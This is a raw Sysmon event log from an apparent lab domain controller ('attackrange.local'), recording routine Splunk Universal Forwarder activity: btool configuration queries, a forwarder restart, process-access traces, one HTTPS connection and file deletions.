10341000x80000000000000007995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EA-6064-C700-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-64EA-6064-C600-00000000AE01}70207028C:\Windows\system32\cmd.exe{266CAFBE-64EA-6064-C700-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.482{266CAFBE-64EA-6064-C700-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EA-6064-C600-00000000AE01}7020C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000007991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EA-6064-C600-00000000AE01}7020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EA-6064-C600-00000000AE01}7020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-64EA-6064-C600-00000000AE01}7020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14738|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.476{266CAFBE-64EA-6064-C600-00000000AE01}7020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796 10341000x80000000000000007983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.439{266CAFBE-64E9-6064-C300-00000000AE01}50326800C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.190{266CAFBE-646C-6064-1500-00000000AE01}13161668C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-C300-00000000AE01}5032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-C300-00000000AE01}5032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-64E9-6064-C200-00000000AE01}50806752C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64E9-6064-C300-00000000AE01}5032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.735{266CAFBE-64E9-6064-C300-00000000AE01}5032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64E9-6064-C200-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 354300x80000000000000008036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.630{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53592-false52.250.195.204-443https 10341000x80000000000000008035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:51.078{266CAFBE-64EA-6064-CB00-00000000AE01}64166244C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:51.031{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA3D569585E29E86DDDC5634A1464575,SHA256=C58B0BCE734E675CDC0CD43E840F24380BD52C5D21F06833B082899CDC22430C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:51.031{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8FE157E5DE67A56E7AAFD8D16565DC2A,SHA256=D845E5B73E32FAB6678A7809FB6487AC5CADEF4A3BD0E6913994F72CC42F6E01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.917{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EC-6064-CE00-00000000AE01}3104C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EC-6064-CE00-00000000AE01}3104C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.901{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 